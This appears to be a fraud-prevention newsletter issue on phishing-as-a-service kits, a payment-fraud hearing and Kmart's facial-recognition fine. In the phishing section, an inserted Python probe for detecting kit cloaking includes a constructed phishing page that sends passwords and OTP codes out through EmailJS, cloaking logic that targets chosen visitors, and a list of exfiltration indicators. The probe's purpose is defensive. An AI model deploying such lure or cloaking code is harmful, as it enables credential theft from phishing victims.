
#50: Phishing Kits, Consumer Protection Hearing, Kmart Fined for Face Scanning
From industrial-scale phishing kits to underwhelming regulation and overreaching tech, this week’s stories show how far the fraud problem has stretched and how uneven the responses are.
Let’s get into it.
NATE'S TAKE - SEPTEMBER 23, 2025
Top Three This Week
- Industrial-Scale Phishing Gets an Upgrade
- National Consumer Groups Push for Tougher Fraud Protections
- Kmart Fined for Using Facial Recognition to Spot Refund Fraud
1. Industrial-Scale Phishing Gets an Upgrade

Lucid and Lighthouse, a pair of phishing-as-a-service platforms, have been linked to over 17,500 phishing domains targeting 316 brands in 74 countries. The services give fraudsters custom phishing templates, real-time victim tracking, and targeting rules that serve the lure only to visitors whose device type, browser, and IP geolocation match the intended victims, which makes the campaigns harder for scanners and takedown teams to detect and block.
Lucid's smishing capabilities (via iMessage and RCS, which sidestep carrier SMS spam filtering) and Lighthouse's template flexibility show how phishing tools have become turnkey products. Some kits go further and show a fake storefront to anyone outside the target profile, so a researcher or crawler sees a harmless shop while the victim sees the login page. Annual subscriptions run up to $1,588, with impersonation kits covering postal services, government agencies, and crypto wallets like MetaMask and Phantom.
Risks to watch:
- Chrome extension spoofing to drain wallets
- EmailJS, a client-side email API, embedded in phishing pages to mail stolen credentials and 2FA codes straight out of the victim's browser, with no attacker-run backend to take down
- Scams requiring crypto deposits to “unlock” tasks or benefits
Phishing infrastructure is scaling fast, and these kits show just how commoditized and targeted modern phishing has become. One practical check: if your brand-protection or takedown process crawls suspect domains from a datacenter IP with a desktop user agent, that is exactly the visitor these kits are built to cloak from, so verify a suspect domain from a realistic mobile profile before declaring it clean.
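As an added example (not code from the original article, and not anything the Lucid or Lighthouse operators publish), the probe below exercises the two kit behaviours described above. It fetches a suspect URL under several client profiles and flags cloaking when the visible text served to one profile barely overlaps what another profile gets, and it inspects each served page for a credential/OTP form and for EmailJS being loaded or called (the SDK CDN path, `emailjs.init`/`emailjs.send`/`emailjs.sendForm`, and the `api.emailjs.com` endpoint are the real SDK artifacts). Network access is abstracted behind a `fetch(url, profile)` callable so the example runs offline; the profiles, the `src_ip` field (which in a real run you would realise through a proxy or VPN exit in the target country) and the `fake_kit` stand-in for a live kit domain are all constructed for the example.

```python
"""Probe a suspected phishing URL for kit-style cloaking and EmailJS exfiltration.

Added example, not part of the original article. fetch(url, profile) -> html is
supplied by the caller; a constructed fake kit is included so it runs offline.
"""
import re
from difflib import SequenceMatcher

# Client profiles the probe cycles through (constructed). Kits key on UA,
# Accept-Language and source IP; src_ip is what the kit would see, which in a
# live run means routing the request through an exit in that country (assumption).
PROFILES = {
    "crawler": {
        "User-Agent": "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
        "Accept-Language": "en-US", "src_ip": "66.249.66.1",
    },
    "desktop_de": {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/128.0",
        "Accept-Language": "de-DE", "src_ip": "91.10.0.5",
    },
    "iphone_us": {
        "User-Agent": "Mozilla/5.0 (iPhone; CPU iPhone OS 17_0 like Mac OS X) Safari/604.1",
        "Accept-Language": "en-US", "src_ip": "98.10.20.30",
    },
}

# Real EmailJS SDK artifacts: CDN package path, legacy CDN host, REST endpoint,
# and the browser calls. A login page has no legitimate reason to mail form
# contents out of the browser, so any hit is a strong phishing indicator.
EMAILJS_INDICATORS = [
    r"@emailjs/browser",
    r"cdn\.emailjs\.com",
    r"api\.emailjs\.com/api/v1\.0/email/send",
    r"emailjs\.init\s*\(",
    r"emailjs\.send(Form)?\s*\(",
]
# Password field or an OTP/2FA-style field name: the lure is harvesting secrets.
CRED_FIELD = re.compile(r'<input[^>]+(type="password"|name="(otp|code|2fa|mfa)")', re.I)


def visible_text(html):
    """Crude tag stripper: compare what a victim would read, not markup noise."""
    text = re.sub(r"<script.*?</script>", " ", html, flags=re.S | re.I)
    text = re.sub(r"<[^>]+>", " ", text)
    return re.sub(r"\s+", " ", text).strip().lower()


def analyze(html):
    """Per-page indicators: which EmailJS patterns hit, and whether a credential form exists."""
    return {
        "emailjs": [p for p in EMAILJS_INDICATORS if re.search(p, html, re.I)],
        "credential_form": bool(CRED_FIELD.search(html)),
    }


def probe(url, fetch, profiles=PROFILES, threshold=0.6):
    """Fetch url once per profile; flag cloaking when any two served pages share
    less than `threshold` of their visible text, and report lure/exfil indicators."""
    pages = {name: fetch(url, p) for name, p in profiles.items()}
    texts = {name: visible_text(h) for name, h in pages.items()}
    names = list(pages)
    min_sim = 1.0
    for i, a in enumerate(names):
        for b in names[i + 1:]:
            min_sim = min(min_sim, SequenceMatcher(None, texts[a], texts[b]).ratio())
    per_profile = {name: analyze(h) for name, h in pages.items()}
    return {
        "cloaked": min_sim < threshold,
        "min_similarity": round(min_sim, 2),
        "lure_profiles": [n for n, r in per_profile.items() if r["credential_form"]],
        "emailjs_exfil": any(r["emailjs"] for r in per_profile.values()),
        "details": per_profile,
    }


# ---- Constructed fake kit standing in for a live phishing domain ----
DECOY = ("<html><body><h1>Outlet Store</h1><p>Shoes, bags and seasonal deals.</p>"
         "<a href='/cart'>Cart</a></body></html>")
LURE = """<html><head>
<script src="https://cdn.jsdelivr.net/npm/@emailjs/browser@3/dist/email.min.js"></script>
</head><body><h1>Postal Service</h1><p>Your parcel is on hold. Confirm your details to release it.</p>
<form id="f"><input name="email"><input type="password" name="pass"><input name="otp"></form>
<script>emailjs.init("PUBLIC_KEY");
document.getElementById("f").onsubmit=function(e){e.preventDefault();emailjs.sendForm("svc","tpl",this);};
</script></body></html>"""


def fake_kit(url, profile):
    """Serve the lure only to English-speaking iPhone visitors not coming from a crawler range."""
    if ("iPhone" in profile["User-Agent"]
            and profile["Accept-Language"].startswith("en")
            and not profile["src_ip"].startswith("66.249.")):
        return LURE
    return DECOY


if __name__ == "__main__":
    print(probe("https://example.invalid/track", fake_kit))
```

Plugging a real fetcher into `probe` (one that sets the profile's headers and routes through the matching exit) turns this into a takedown-evidence tool: the `details` map records which profile received the credential form and which EmailJS strings appeared, which is the material a hosting provider or EmailJS abuse desk needs.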
2. National Consumer Groups Push for Tougher Fraud Protections

At a recent U.S. House hearing on payment fraud, Carla Sanchez-Adams of the National Consumer Law Center made it clear: payment fraud is a national crisis and current protections aren’t enough. With $12.5 billion in reported consumer fraud losses in 2024 alone (and likely much more unreported), she called for stronger legal and technical safeguards across the financial system.
Key areas of concern:
- Peer-to-peer payment apps, crypto platforms, and wire transfers are increasingly abused by scammers, and EBT card skimming is draining benefits from recipients who have little recourse.
- Vulnerable groups, including older Americans and low-income communities, are hit hardest and often struggle to recover.
Sanchez-Adams urged Congress to close protection gaps, hold both sending and receiving institutions accountable, and modernize outdated laws. She also called for interagency data sharing and tighter oversight of telecom and social platforms, which are often exploited to deliver scam messages.
As we've seen in past FIF issues, payments fraud is becoming a systemic risk. Congress and regulators are finally acknowledging the scope of the problem, but so far, there’s more talk than teeth. For fraud leaders, that means continuing to build layered defenses, because legislative help still isn’t arriving fast.
3. Kmart Fined for Using Facial Recognition to Spot Refund Fraud

Australia’s privacy watchdog has ruled that Kmart violated privacy laws by scanning the faces of every customer entering 28 of its stores between 2020 and 2022, all in an effort to stop refund fraud.
The ruling focused on proportionality: Kmart collected sensitive biometric data on thousands of people without their consent, including individuals not suspected of any wrongdoing. The system was found to have minimal fraud-prevention impact and failed to meet the standards of transparency or necessity under Australia’s Privacy Act.
The takeaway for fraud teams? Biometric surveillance can't be justified as a blanket measure, especially when less invasive controls (like stricter ID checks at the returns counter) are available. A fraud control has to be proportionate to the fraud it prevents, in the data it collects as well as in who it touches, and even a well-intentioned strategy can cross legal and ethical lines if that proportionality isn't designed in from the start.
===
That’s all for this week! For more insights, follow us on LinkedIn or X, and if you want to learn more about what we do, visit www.specprotected.com.
Nate Kharrl, CEO and co-founder at Spec, has built leading solutions for application security and fraud challenges since the early days of the cloud era. Drawing from his cybersecurity experience at Akamai, ThreatMetrix, and eBay, Nate helped found Spec to focus on the needs of businesses operating in a landscape of increasing AI risks. Under Nate's leadership, Spec grew from its mid-pandemic founding to raise $30M in venture-backed funding to build solutions used by Fortune 500 companies transacting billions in online commerce. Spec's service offerings today include protective measures for websites and APIs that specialize in defending against attacks designed to bypass bot defenses and risk assessment platforms.